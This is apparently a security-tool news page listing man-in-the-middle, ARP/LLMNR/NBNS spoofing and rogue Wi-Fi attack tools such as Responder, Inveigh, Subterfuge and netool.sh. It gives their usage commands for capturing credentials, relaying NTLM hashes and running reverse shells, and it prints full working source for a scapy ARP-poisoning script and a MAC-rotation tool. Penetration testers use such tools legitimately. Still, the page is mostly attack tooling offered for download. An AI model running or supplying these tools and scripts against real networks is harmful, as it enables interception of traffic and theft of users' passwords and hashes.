Channel: Spoofing/Spoofer – Security List Network™
MITM_Toolkit is a toolkit for automating MITM attack management.

MITM_Toolkit is a toolkit for automating MITM attack management with ettercap. It is a collection of scripts to assist with MITM attacks.
Incremental Poison:
This shell script accepts 3 arguments: the interface you are using (eth1, eth2, etc.), the number of concurrent hosts you want to poison, and the name of a directory to write the packet captures to. When launched, it opens a separate gnome-terminal (so you have to run it in the desktop interface) and starts poisoning. To move to the next batch, just hit the ‘q’ button on that interface and it will gracefully shut down, re-ARP the hosts (to prevent disruption), and then launch the next set. While this is happening, everything is being dumped into an organized collection of log files. Currently the script assumes the gateway is on your /24 network (so it should work out of the box 90% of the time). It will be updated to support more unusual cases as well.

Interface Incremental Poison

Pcap Parser:
This shell script accepts 1 argument. The argument describes the path to the output directory from Incremental Poison, which contains all of the pcap files from a poisoning attack. It passes these pcaps through Ettercap -r and PCredz to extract credentials from the captured traffic.

Pcap-Parser

Download : Mitm_Toolkit (62,9 KB)
Source : https://github.com/pan0pt1c0n


Updates Responder v-2.2 ~ an LLMNR, NBT-NS and MDNS poisoner.

Latest Change v-2.2:
– Server; Fixed Harsh Parser variable typo.
– Tools; FindSMB2UPTime now working properly.
– packets.py; FindSMB2UPTime now working properly.

This tool is first an LLMNR and NBT-NS responder. It will answer *specific* NBT-NS (NetBIOS Name Service) queries based on their name suffix (see: http://support.microsoft.com/kb/163409). By default, the tool will only answer File Server Service requests, which are for SMB. The concept behind this is to target our answers and be stealthier on the network. This also helps to ensure that we don’t break legitimate NBT-NS behavior.

Responder On Windows XP/2003 Server/7/8.1

Responder on Unix platforms: MacOSX, Kali-Sana, Arch Linux, Debian, Ubuntu, etc. Installation using git.

FEATURES
========

– Built-in SMB Auth server.
Supports NTLMv1, NTLMv2 hashes with Extended Security NTLMSSP. Successfully tested from NT4 to Server 2012 RC, Samba and Mac OSX Lion. Clear text password is supported for NT4. This functionality is enabled by default when the tool is launched.

– Built-in MSSQL Auth server.
In order to redirect SQL Authentication to this tool, you will need to
set the option -r to 1 (NBT-NS queries for SQL Server lookup are
using the Workstation Service name suffix) for systems older than
Windows Vista (LLMNR will be used for Vista and higher). This server
supports NTLMv1, LMv2 hashes. This functionality was successfully tested
on Windows SQL Server 2005 & 2008.

– Built-in HTTP Auth server.
In order to redirect HTTP Authentication to this tool, you will need
to set the option -r to 1 for Windows version older than Vista (NBT-NS
queries for HTTP server lookup are sent using the Workstation Service
name suffix). For Vista and higher, LLMNR will be used. This server
supports NTLMv1, NTLMv2 hashes *and* Basic Authentication. This server
was successfully tested on IE 6 to IE 10, Firefox, Chrome, Safari.
Note: This module also works for WebDav NTLM authentication issued from
Windows WebDav clients (WebClient).

– Built-in LDAP Auth server.
In order to redirect LDAP Authentication to this tool, you will need
to set the option -r to 1 for Windows version older than Vista (NBT-NS
queries for HTTP server lookup are sent using the Workstation Service
name suffix). For Vista and higher, LLMNR will be used. This server
supports NTLMSSP hashes and Simple Authentication (clear text authentication). This server
was successfully tested on Windows Support tool “ldp” and LdapAdmin.

– Built-in FTP Auth server.
This module will collect FTP clear text credentials.

– Built-in small DNS server. This server will answer type A queries. This
is really handy when it’s combined with ARP spoofing.

– All hashes are printed to stdout and dumped to a unique John Jumbo
compliant file, using this format:
(SMB or MSSQL or HTTP)-(ntlm-v1 or v2 or clear-text)-Client_IP.txt
The file will be located in the current folder.

– Responder logs all its activity to a file, Responder-Session.log.

– When the option -f is set to “On”, Responder will fingerprint every host who issued an LLMNR/NBT-NS query.
All capture modules still work while in fingerprint mode.

– Browser Listener finds the PDC in stealth mode.

– ICMP Redirect for MITM on Windows <= 5.2 Domain members. This attack combined with the DNS module is pretty effective.

USAGE
=====

Running this tool:

– python Responder.py [options]

Usage Example:

python Responder.py -i 10.20.30.40 -b 1 -r 0 -f On

Options List:

-h, --help
    Show this help message and exit.

-i 10.20.30.40, --ip=10.20.30.40
    The IP address to redirect the traffic to (usually yours).

-b 0, --basic=0
    Set this to 1 if you want to return a Basic HTTP authentication. 0 will return an NTLM authentication.

-s Off, --http=Off
    Set this to On or Off to start/stop the HTTP server. Default value is On.

-S Off, --smb=Off
    Set this to On or Off to start/stop the SMB server. Default value is On.

-q Off, --sql=Off
    Set this to On or Off to start/stop the SQL server. Default value is On.

-r 0, --wredir=0
    Set this to enable answers for netbios wredir suffix queries. Answering to wredir will likely break stuff on the network (like classics ‘nbns spoofer’ will). Default value is therefore set to Off (0).

-c 1122334455667788, --challenge=
    The server challenge to set for NTLM authentication. If not set, then defaults to 1122334455667788, the most common challenge for existing Rainbow Tables.

-l file.log, --logfile=filename.log
    Log file to use for Responder session.

-f Off, --fingerprint=Off
    This option allows you to fingerprint a host that issued an NBT-NS or LLMNR query.

-F On, --ftp=On
    Set this to On or Off to start/stop the FTP server. Default value is On.

-L On, --ldap=On
    Set this to On or Off to start/stop the LDAP server. Default value is On.

-D On, --dns=On
    Set this to On or Off to start/stop the DNS server. Default value is On.

Download version : Responder.zip(96.9 KB)
source : https://github.com/SpiderLabs/Responder | http://blog.spiderlabs.com/2012/10/introducing-responder-10.html
Our post Before : http://seclist.us/updates-responder-v-2-1-3-is-a-llmnr-and-nbt-ns-poisoner.html

Subterfuge v1.0.1 – Superfish; Automated Man-in-the-Middle Attack Framework.

Changelog Version 1.0.1 – Superfish!
+ Subterfuge can now MITM SSL sessions using arbitrary certificates
+ SSLStripping can be selectively enabled or disabled as desired
+ Subterfuge can leverage the Superfish Bug
+ CRITICAL UPDATE: The new version of Django was causing Subterfuge to fail on default installs of Kali Linux. Subterfuge 1.0.1 release with emergency fixes to critical framework files

Enter Subterfuge, a Framework to take the arcane art of Man-in-the-Middle Attacks and make it as simple as point and shoot. Subterfuge demonstrates vulnerabilities in the ARP Protocol by harvesting credentials that go across the network and even exploiting machines by injecting malicious code directly into their browsing sessions.

Installation
Follow the steps below to download and install the latest version of Subterfuge:

git clone https://github.com/Subterfuge-Framework/Subterfuge.git
cd Subterfuge
python setup.py

Execute Subterfuge by running the following command: subterfuge

Our Post Before | Source : http://kinozoa.com/blog/subterfuge/

ARP MiTM Captive Portal.

This is ARP MiTM Captive Portal.
With the main menu:
1. Captive Portal – Log In Creds / Reverse Shell
2. Captive Portal – Log In Creds / Reverse Shell with DNS Spoof
3. SMB – Hash Grab
4. SMB – Hash Relay
5. Web – Beef Hook
6. Web – SSL Strip and Capture Traffic
7. Web – BDFproxy/BDFfactory
8. Web – Hamster/Ferret

ARP MiTM Captive Portal

Captive Portal – HTA Reverse Shell:
1. Cisco
2. Microsoft Forefront
3. Sophos
4. SQUID
5. TrendMicro
6. Fortigate\Fortinet
7. Flash Updater
8. Forttinet – Old Style
9. Custom

Reverse Shell Menu

Installation:
– git clone https://github.com/CroweCybersecurity/MiTM-CaptivePortal.git
– cd MiTM-CaptivePortal
– chmod +x
– run “./mitm-portal.sh”
This script has been tested on Kali-Sana 2.0 Desktop or in a VMWare machine.

Source : https://github.com/CroweCybersecurity

Updates Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB.

Changelog 21/09/2015:
+ Updated the SMB relay add user example
The old generic add user example would not work on a system with complex password requirements. Added an actual username and password to avoid confusion.

Inveigh

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB attacks, VLAN pivoting, or even restrictions from the client.

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB

Notes:
– Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/SMB NTLMv1/NTLMv2 challenge/response capture.
– LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.
– SMB challenge/response captures are performed by sniffing over the host system’s SMB service.
– HTTP challenge/response captures are performed with a dedicated listener.
– The local LLMNR/NBNS services do not need to be disabled on the host system.
– LLMNR/NBNS spoofer will point victims to host system’s SMB service, keep account lockout scenarios in mind.
– Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
– Ensure that the LLMNR, NBNS, SMB, HTTP ports are open within any local firewall on the host system.
– Output files will be created in current working directory.
– If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.
– Code is proof of concept level and may not work under some scenarios.

Usage :
Obtain an elevated administrator or SYSTEM shell. If necessary, execute Set-ExecutionPolicy Unrestricted within PowerShell.
To execute with default settings:

Inveigh.ps1 -i localip

To execute with features enabled/disabled:

Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -HTTP Y/N -SMB Y/N

Download: Master.zip  | Clone Url | Our Post Before
Source : https://github.com/Kevin-Robertson

Infernal Twin ~ a wireless security assessment tool.

BUG FIXES 23/9/2015:
+ Wireless Evil Access Point traffic redirect
+ Fixed WPA2 Cracking
+ Fixed Infernal Wireless
+ Fixed Free AP
+ Check for requirements
+ DB implementation via config file
+ Improved Catch and error
+ Check for requirements
+ Works with Kali 2
CHANGES:
+ Improved compatibility
+ Report improvement
+ Better NAT Rules

infernal-twin is a wireless security assessment tool.

infernal twin - wireless security assessment tools

NEW FEATURES:
GUI wireless security assessment suite
+ Implemented
— WPA2 hacking
— WEP Hacking
— WPA2 Enterprise hacking
— Wireless Social Engineering
— SSL Strip
— Report generation
— PDF Report
— HTML Report
— Note taking function
— Data is saved into Database
— Network mapping
— MiTM
— Probe Request

Installation:
– git clone https://github.com/entropy1337/infernal-twin
– cd infernal-twin
– python setup.py
– configure your mysqldb
– python InfernalWireless.py (run it from the same folder where your code exists) to run the script.

Source : https://github.com/entropy1337

Scapyarpspoof is a simple, effective and useful ARP spoofer script using scapy.

scapyarpspoof is a simple, effective and useful ARP spoofer script using scapy.
This will arpspoof x.x.x.5 on your network, sending requests to the target and replies to the router. Classic MiTM using ARP packets.

Usage:

This script runs smoothly on Ubuntu, all Debian, Arch Linux, Kali-Sana.

Example Attack

arpspoof.py Script:

#!/usr/bin/env python
#
# arpspoof.py - simple effective scapy ARP spoofer
#  thed4rkcat@yandex.com
#
## This program is free software: you can redistribute it and/or modify
## it under the terms of the GNU General Public License as published by
## the Free Software Foundation, either version 2 of the License, or
## (at your option) any later version.
#
## This program is distributed in the hope that it will be useful,
## but WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
## GNU General Public License at (http://www.gnu.org/licenses/) for
## more details.

from netifaces import gateways, AF_INET, AF_LINK, ifaddresses
from scapy.all import *
from time import sleep
from os import popen
from re import match
from argparse import ArgumentParser

def fvalidip(ip):
	if match(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$",ip):
		return ip
	else:
		return False

def fvalidmac(mac):
	if match("[0-9a-f]{2}([-:])[0-9a-f]{2}(\\1[0-9a-f]{2}){4}$", mac.lower()):
		return mac
	else:
		return False

def fgetmac(ip):
	popen('ping %s -c 1' % ip).read()
	mac = popen("arp -a | grep '(%s)' | cut -d 't' -f 2 | cut -d ' ' -f 2" %(ip)).read().strip()
	return fvalidmac(mac)

def fownmac():
	def_gw_device = gateways()['default'][AF_INET][1]
	mac = ifaddresses(def_gw_device)[AF_LINK][0]['addr']
	return fvalidmac(mac)

def ffix():
	for target in targetlist:
		targetip = target[0]
		targetmac = target[1]
		resettarget=ARP(op=1,psrc=routerip,pdst=targetip,hwdst=targetmac, hwsrc=routermac)
		resetrouter=ARP(op=2,psrc=targetip,pdst=routerip,hwdst=routermac, hwsrc=targetmac)
		send(resetrouter, count=4, verbose=False)
		send(resettarget, count=4, verbose=False)
		print ' [*] Fixed ARP tables for %s' % targetip
	if not args.mac:
		popen("echo 0 > /proc/sys/net/ipv4/ip_forward").read()

parser = ArgumentParser(prog='arpspoof', usage='./arpspoof.py [options]')
parser.add_argument('-t', "--targets", type=str, help='Target IP extensions eg. 13,215,23')
parser.add_argument('-m', "--mac", type=str, help='Spoof to user defined MAC.')
parser.add_argument('-r', "--replies", action="store_true", help='Use ARP replies instead of requests.')
parser.add_argument('-n', "--norouter", action="store_true", help='Only poison the target, not the router.')
parser.add_argument('-f', "--nofix", action="store_true", help="Don't fix ARP tables after poison.")
args = parser.parse_args()
ismitm = ''

routerip = gateways()['default'].values()[0][0]
if fvalidip(routerip):
	network = '.'.join(routerip.split('.')[:3])
else:
	print " [X] Error detecting the router IP, got: %s" % routerip
	exit()

try:
	targets = args.targets.split(',')
except:
	parser.print_help()
	exit()

routermac = fgetmac(routerip)
if routermac:
	print " [*] Detected router: %s (%s)" % (routerip, routermac)
else:
	print " [X] Error detecting the router MAC, got: %s" % routermac
	exit()
	
ownmac = fownmac()
if not ownmac:
	print " [X] Error detecting our own MAC, got: %s" % ownmac
	exit()

if args.mac:
	spoofmac = args.mac
	if not fvalidmac(spoofmac):
		print " [X] Your user defined spoof MAC is not valid, got: %s" % spoofmac
		exit()
else:
	spoofmac = ownmac
	popen("echo 1 > /proc/sys/net/ipv4/ip_forward").read()
	ismitm = ' (MiTM)'

targetlist = []
for target in targets:
	targetip = '%s.%s' % (network, target)
	targetmac = fgetmac(targetip)
	if targetmac:
		print " [*] Detected target: %s (%s)" % (targetip, targetmac)
		targetlist.append([targetip, targetmac])
	else:
		print ' [X] Error: No MAC for %s found, skipping' % (targetip)

if args.replies:
	targetop = 2
	print " [*] Using ARP replies."
else:
	targetop = 1
	print " [*] Using ARP requests."

print " [*] Spoofing to: %s%s" % (spoofmac, ismitm)
print " [*] Attacking."

try:
	while True:
		for target in targetlist:
			targetip = target[0]
			targetmac = target[1]
			poisontarget=ARP(op=targetop,psrc=routerip,pdst=targetip,hwdst=targetmac, hwsrc=spoofmac)
			poisonrouter=ARP(op=2,psrc=targetip,pdst=routerip,hwdst=routermac, hwsrc=spoofmac)
			if args.norouter:
				send(poisontarget, verbose=False)
			else:
				send(poisonrouter, verbose=False)
				send(poisontarget, verbose=False)

		sleep(1.5)

except:
	print
	if args.nofix:
		print ' [*] Leaving ARP tables poisoned..'
	else:
		print ' [*] Fixing ARP tables..'
		ffix()

Source : https://github.com/d4rkcat

Creak ~ Poison, reset, spoof, redirect MITM script.

Deny navigation and download capabilities of a target host in the local network by performing an ARP poison attack and sending TCP reset packets for every request made to the router.

example usage

Latest change 9/26/2015: Modularization
requirements:
+ DPKT
+ pypcap
TODO:
– Multiple hosts denying
– DNS spoofing with redirect
– Scan mode

Download : creak.zip(19.5 KB)
Source : https://github.com/codepr


Creak v0.0.2 ~ Poison, reset, spoof, redirect MITM script.

Changelog v0.0.2 – 2015-09-29:
+## Added
+- DNS spoofing
+- Manufacturer based mac spoof
+- Basic scan mode for active sessions on target machine
+## Changed
+- Random mac address generation
+- Better arp poison system, delay added
+## Fixed
+- Mac address spoofing

Deny navigation and download capabilities of a target host in the local network by performing an ARP poison attack and sending TCP reset packets for every request made to the router.

example usage

Latest change 9/26/2015: Modularization
requirements:
+ DPKT
+ pypcap
TODO:
– Multiple hosts denying
– DNS spoofing with redirect
– Scan mode

Download : creak.zip(19.5 KB)
Source : https://github.com/codepr

Module version of Inveigh released.

Invoke is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP(S)/SMB and NTLMv2 HTTP to SMB relay.
DESCRIPTION:
Invoke is a Windows PowerShell LLMNR/NBNS spoofer designed to assist penetration testers that find themselves limited to a Windows system. This can commonly occur while performing phishing attacks, USB drive attacks, VLAN pivoting, or simply being restricted to a Windows system as part of client imposed restrictions.

Module version of Inveigh

~ Parameter ~
.PARAMETER IP
Specify a specific local IP address for listening. This IP address will also be used for LLMNR/NBNS spoofing if the ‘SpoofIP’ parameter is not set.
.PARAMETER SpooferIP
Specify an IP address for LLMNR/NBNS spoofing. This parameter is only necessary when redirecting victims to another system.
.PARAMETER HTTP
Default = Enabled: Enable/Disable HTTP challenge/response capture.
.PARAMETER HTTPS
Default = Disabled: Enable/Disable HTTPS challenge/response capture. Warning, a cert will be installed in the local store and attached to port 443.
If the script does not exit gracefully, execute “netsh http delete sslcert ipport=0.0.0.0:443” and manually remove the certificate from “Local Computer\Personal” in the cert store.
.PARAMETER SMB
Default = Enabled: Enable/Disable SMB challenge/response capture. Warning, LLMNR/NBNS spoofing can still direct targets to the host system’s SMB server.
.PARAMETER LLMNR
Default = Enabled: Enable/Disable LLMNR spoofing.
.PARAMETER NBNS
Default = Disabled: Enable/Disable NBNS spoofing.
.PARAMETER NBNSTypes
Default = 20: Comma separated list of NBNS types to spoof. Types include 00 = Workstation Service, 03 = Messenger Service, 20 = Server Service, 1B = Domain Name
.PARAMETER Challenge
Default = Random: Specify a 16 character hex NTLM challenge for use with the HTTP listener. If left blank, a random challenge will be generated for each request.
.PARAMETER SMBRelay
Default = Disabled: Enable/Disable SMB relay.
.PARAMETER SMBRelayTarget
IP address of system to target for SMB relay.
.PARAMETER SMBRelayCommand
Command to execute on SMB relay target.
.PARAMETER SMBRelayUsernames
Default = All Usernames: Comma separated list of usernames to use for relay attacks. Accepts either just the username or domain\username format.
.PARAMETER SMBRelayAutoDisable
Default = Enable: Automatically disable SMB relay after a successful command execution on target.
.PARAMETER SMBRelayNetworkTimeout
Default = No Timeout: Set the duration in seconds that Inveigh will wait for a reply from the SMB relay target after each packet is sent.
.PARAMETER Repeat
Default = Enabled: Enable/Disable repeated LLMNR/NBNS spoofs to a victim system after one user challenge/response has been captured.
.PARAMETER ForceWPADAuth
Default = Enabled: Matches Responder option to Enable/Disable authentication for wpad.dat GET requests. Disabling can prevent browser login prompts.
.PARAMETER ConsolePrompt
Default = Enabled: Enable/Disable the console prompt.
.PARAMETER RunTime
Set the run time duration in minutes. Note that leaving the Inveigh console open will prevent Inveigh from exiting once the set run time is reached.
.PARAMETER ConsoleOutput
Default = Console Output Disabled: Enable/Disable realtime console output.
.PARAMETER FileOutput
Default = File Output Disabled: Enable/Disable realtime file output.
.PARAMETER OutputDir
Default = Working Directory: Set an output directory for log and capture files.
.PARAMETER ShowHelp
Default = Enabled: Enable/Disable the help messages at startup.

Inveigh is a Windows PowerShell LLMNR/NBNS spoofer with challenge/response capture over HTTP/SMB

Notes:
– Currently supports IPv4 LLMNR/NBNS spoofing and HTTP/SMB NTLMv1/NTLMv2 challenge/response capture.
– LLMNR/NBNS spoofing is performed through sniffing and sending with raw sockets.
– SMB challenge/response captures are performed by sniffing over the host system’s SMB service.
– HTTP challenge/response captures are performed with a dedicated listener.
– The local LLMNR/NBNS services do not need to be disabled on the host system.
– LLMNR/NBNS spoofer will point victims to host system’s SMB service, keep account lockout scenarios in mind.
– Kerberos should downgrade for SMB authentication due to spoofed hostnames not being valid in DNS.
– Ensure that the LLMNR, NBNS, SMB, HTTP ports are open within any local firewall on the host system.
– Output files will be created in current working directory.
– If you copy/paste challenge/response captures from output window for password cracking, remove carriage returns.
– Code is proof of concept level and may not work under some scenarios.

Usage :
Obtain an elevated administrator or SYSTEM shell. If necessary, execute Set-ExecutionPolicy Unrestricted within PowerShell.
To execute with default settings:

Inveigh.ps1 -i localip

To execute with features enabled/disabled:

Inveigh.ps1 -i localip -LLMNR Y/N -NBNS Y/N -HTTP Y/N -SMB Y/N

Download: Master.zip  | Clone Url | Our Post Before
Source : https://github.com/Kevin-Robertson

3vilTwinAttacker v0.6.7 released – Framework for Rogue Wi-Fi Access Point Attack.

Changelog v-0.6.7:
+ added Probe Request discovery mac Devices
+ added plugins options
+ added PopUpServer options
+ added Java Update Fake
+ code improvements
+ fixed small bugs
— phishing error directory
— fixed resolve host select adapter
— fixed rules iptables redirect
— fixed arp poison cache

3vilTwinAttacker is a security tool that provides a rogue access point for Man-In-The-Middle and network attacks, purporting to provide wireless Internet services but snooping on the traffic. It can be used to capture the credentials of unsuspecting users by either snooping the communication or by phishing.

Dependencies:
– python-qt4
– python-scapy
– python-nmap (optional)
– python-BeautifulSoup
– airbase-ng (include in aircrack-ng)
– isc-dhcp-server

Features:
– Rogue Wi-Fi Access Point
– Deauth Clients AP
– Probe Request Monitor
– DHCP Starvation Attack
– Credentials Monitor
– Windows Update Attack
– Templates phishing
– Dump credentials phishing
– Support airodump scan
– Support mdk3 deauth
– beef hook support
– Report Logs html
– Mac Changer
– ARP Poison
– DNS Spoof
– Plugins
— net-creds
— sslstrip
– Tools
— ettercap
— driftnet

Download : v0.6.7.zip  | v0.6.7.tar.gz
Source : https://github.com/P0cL4bs | Our Post Before

Android Network Spoofer v-2.4.0 released.

Changelog v-2.4.0 10/16/2015:
+ Added better root checks.
Many users complained that Network Spoofer didn’t work on Android 5.1. Most had root disabled. This adds extra checks.

Network Spoofer lets you change websites on other people’s computers from an Android phone.

Features include:
+ Flip pictures upside down
+ Flip text upside down
+ Make websites experience gravity
+ Redirect websites to other pages
+ Delete random words from websites
+ Replace words on websites with others
+ Change all pictures to Trollface
+ Wobble all pictures / graphics around a bit

Disclaimer:
Please note that there is no intention for Network Spoofer to include any malicious features. This application is a fun demonstration of how vulnerable home networks are to simple attacks, with permission of the network owner – DO NOT attempt to use Network Spoofer on any corporate or other non-residential networks (eg. at school, university). It becomes very obvious when Network Spoofer is being used on a Network, and use of Network Spoofer will be considered malicious hacking by network administrators.

Requirements
Network Spoofer runs on Android devices with the following requirements:
– Which are rooted (‘su’).
– Which have Wifi.
The first can be obtained by using a custom firmware such as CyanogenMod. Alternatively search on the internet for instructions on how to root your phone.

Download:
android-netspoof-2.4.0.apk | Zipball | Tarball
Source : http://www.digitalsquid.co.uk/netspoof/
Old post: http://seclist.us/updates-android-network-spoofer-v-2-3-0.html

netool.sh V- 4.5.2 released : MitM PENTESTING OPENSOURCE T00LKIT.

Changelog v-4.5.2:
+ UPGRADE => msfcli replaced by msfconsole
+ netool.sh => “added” file selection GUI -> zenity displays
+ priv8.sh => “added” MitM DLINK phishing -> capture routers creds
+ priv8.sh => “added” adobe_flash_hacking_team_uaf -> mitm+dns_spoof
+ INSTALL.sh => “added” build shortcut to toolkit -> gnome-desktop-item-edit
* netool.sh => “improved” input interface in use bug-fixed -> ettercap modules
* priv8.sh => “bug-fixed” ettercap IPV6 bug-fixed -> target selection /// ///
* priv8.sh => “improved” java.jar phishing -> download using phishing webpage or direct URL execute…

“Scanning – Sniffing – Social Engineering”

Netool is a toolkit written in bash, python and ruby that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. This toolkit makes tasks easy such as sniffing tcp/udp traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, DoS attacks in wan/lan networks and TCP/UDP packet manipulation using etter-filters, and gives you the ability to capture pictures of the target's web browsing (driftnet). It also uses macchanger to decoy scans by changing the mac address.

Rootsector: this module allows you to automate some attacks over DNS_SPOOF + MitM (phishing – social engineering) using the metasploit, apache2 and ettercap frameworks, such as the generation of payloads, shellcode and backdoors delivered using the dns_spoof and MitM method to redirect a target to your phishing webpage.

Recently the “inurlbr” webscanner (by cleiton) was introduced, which allows us to search for SQL related bugs using several search engines. This framework can also be used in conjunction with other frameworks like nmap (using the flag --comand-vul).

Installation:

git clone git://git.code.sf.net/p/netoolsh/opensource-kali opensource
cd opensource
chmod +x INSTALL.sh
./INSTALL.sh

Update type: u

Example: 

inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27
-s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

Operative Systems Supported:
Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS | Linux-backtrack (discontinued) | Mac osx (discontinued).

“TOOLKIT DEPENDENCIES”
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip

“SCANNER INURLBR.php”
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl

Features (Modules) :

"1-Show Local Connections"
  "2-Nmap Scanner menu"
        ->
        Ping target
        Show my Ip address
        See/change mac address
        change my PC hostname
        Scan Local network 
        Scan external lan for hosts
        Scan a list of targets (list.txt)          
        Scan remote host for vulns          
        Execute Nmap command
        Search for target geolocation
        ping of dead (DoS)
        Norse (cyber attacks map)
        nmap Nse vuln modules
        nmap Nse discovery modules
        <-
  "3-Open router config"       
  "4-Ip tracer whois"
  "5-firefox webcrawler addon"                           
  "6-Retrieve metadata"
        ->
        retrieve metadata from target website
        retrieve using a fake user-agent
        retrieve only certain file types
        <-
  "7-INURLBR.php (webcrawler)"
        -> 
        scanner inurlbr.php -> Advanced search with multiple engines, provided
        analysis enables to exploit GET/POST capturing emails/urls & internal
        custom validation for each target/url found. also the ability to use
        external frameworks in conjuction with the scanner like nmap,sqlmap,etc
        or simple the use of external scripts.
        <-
  "8-r00tsect0r automated exploits (phishing - social engeneering)"
        ->
        package.deb backdoor [Binary linux trojan]
        Backdooring EXE Files [Backdooring EXE Files]
        fakeupdate.exe [dns-spoof phishing backdoor]
        meterpreter powershell invocation payload [by ReL1K]
        host a file attack [dns_spoof+mitm-hosted file]
        clone website [dns-spoof phishing keylooger]
        Java.jar phishing [dns-spoof+java.jar+phishing]
        clone website [dns-spoof + java-applet]
        clone website [browser_autopwn phishing Iframe]
        Block network access [dns-spoof]
        Samsung TV DoS [Plasma TV DoS attack]
        RDP DoS attack [Dos attack against target RDP]
        website D0S flood [Dos attack using syn packets]
        firefox_xpi_bootstarpped_addon automated exploit
        PDF backdoor [insert a payload into a PDF file]
        Winrar backdoor (file spoofing)
        VBScript injection [embedded a payload into a world document]
        ".::[ normal payloads ]::."
        windows.exe payload
        mac osx payload
        linux payload
        java signed applet [multi-operative systems]
        android-meterpreter [android smartphone payload]
        webshell.php [webshell.php backdoor]
        generate shellcode [C,Perl,Ruby,Python,exe,war,vbs,Dll,js]
        Session hijacking [cookie hijacking]
        start a lisenner [multi-handler]
        <-
  "9-Config ettercap"         
  "10-Launch MitM"            
  "11-Show URLs visited"       
  "12-Sniff remote pics"
  "13-Sniff SSL passwords"      
  "14-Dns-Spoofing"
  "15-Share files on lan"   
  "16-DoS attack {local}"      
  "17-Compile etter.filters"    
  "18-execute ettercap filter"
  "19-Common user password profiler [cupp.py]"

  d. delete lock folders
  a. about netool
  u. check for updates
  c. config toolkit
 db. access database
  q. quit

Download :
opensource.tar.gz (26.5 MB)
opensource[kali].tar.gz (26.5 MB)
Source : http://sourceforge.net/projects/netoolsh/

MCfly is an interactive program that spoofs MAC addresses in a given interval.


MCfly is an interactive tool for Linux that spoofs MAC addresses in a given interval.
Script :

import uuid, re, random, os, subprocess, time, threading, sys, string
from colorama import init

###Colors###
init(autoreset=True)
white = '\x1B[37m';dgray = '\x1b[90m';DGRAY = '\x1b[100m';lred = '\x1b[91m';LRED = '\x1b[101m';lgreen = '\x1b[92m';LGREEN = '\x1b[102m';lyellow = '\x1b[93m';LYELLOW = '\x1b[103m';lblue = '\x1b[94m';LBLUE = '\x1b[104m';lmagenta = '\x1b[95m';LMAGENTA = '\x1b[105m';lcyan = '\x1b[96m';LCYAN = '\x1b[106m';lgray = '\x1b[97m';LGRAY = '\x1b[107m';BOLD = '\x1B[1m'

###Art###
print lyellow + '''
   ___           __         
  / _ )___ _____/ /__       
 / _  / _ `/ __/  '_/       
/____/\_,_/\__/_/\_\        
/_  __/__/_  __/ /  ___     
 / / / _ \/ / / _ \/ -_)    
/_/__\___/_/_/_//_/\__/     
  / __/_ __/ /___ _________ 
 / _// // / __/ // / __/ -_)
/_/  \_,_/\__/\_,_/_/  \__/ 
MCfly is an interactive program that spoofs 
MAC addresses in a given interval.
Author is not responsible to any damage caused
by this program
KittySec(C)                            
'''

###List of vendor MAC prefix
vendors = ['00:05:9A', '00:19:56', '00:02:B3', '00:00:C6', '00:11:11', '00:48:54'] 

def countdown(t):
    # Show a one-line countdown until the next MAC change
    while t:
        mins, secs = divmod(t, 60)
        timeformat = '{:02d}:{:02d}'.format(mins, secs)
        sys.stdout.write(lmagenta + '\r' + '[info]' + white + ' Next spoof in: ' + timeformat + ' seconds\r')
        sys.stdout.flush()
        time.sleep(1)
        t -= 1

def rand(size=2, chars=string.hexdigits):
    # Random hex string; one MAC octet by default
    return str(''.join(random.choice(chars) for _ in range(size)))

def generateMAC():
    # Vendor prefix from the list above plus three random octets
    randomMAC = random.choice(vendors) + ':' + rand() + ':' + rand() + ':' + rand()
    return str(randomMAC).upper()

def spoofMAC(iface, interval):
    # Re-arm the timer first so the next change is scheduled even if this one fails
    threading.Timer(interval, spoofMAC, [iface, interval]).start()
    try:
        generatedMAC = generateMAC()
        # Argument list instead of a shell string: iface comes from user input
        subprocess.call(['ifconfig', iface, 'hw', 'ether', generatedMAC])

        # Parse ifconfig output for the chosen interface only
        spoofedMAC = str(subprocess.check_output(['ifconfig', iface])).split('HWaddr')
        spoofedMAC = spoofedMAC[1].split(' ')
        spoofedMAC = spoofedMAC[1]

        # Check for successful spoofing
        if spoofedMAC.upper() == generatedMAC:
            print lgreen + '[+]' + ' Spoofed MAC address to ' + generatedMAC
            countdown(interval)
        else:
            print lred + '[-] There was an error'
    except Exception as e:
        print lred + '[-] Error ' + str(e)


originalMAC = str(':'.join(re.findall('..', '%012x' % uuid.getnode()))).upper()
print lmagenta + '[info] ' + white + 'Original MAC address is: ' + originalMAC

# List available interfaces
availIfaces = os.listdir('/sys/class/net/')

# Take user input and accept only an interface that exists on this host
iface = str(raw_input(lyellow + '[?] Choose interface: ' + str(availIfaces) + '\n'))
if iface not in availIfaces:
    sys.exit(lred + '[-] Unknown interface: ' + iface)
interval = int(raw_input(lyellow + '[?] Each how many minutes would you like to spoof to a newer MAC address?\n'))
interval = interval * 60
spoofMAC(iface, interval)

Source : https://github.com/kittysec

Updates Inveigh is a Windows PowerShell LLMNR/NBNS spoofer.


Latest Change :
+ SMB relay fix: some hard coded packet data that needed to be dynamic.
+ Invoke-InveighRelay currently supports NTLMv2 HTTP to SMB relay with psexec style command execution.

Invoke-InveighRelay is the main Inveigh SMB relay function.

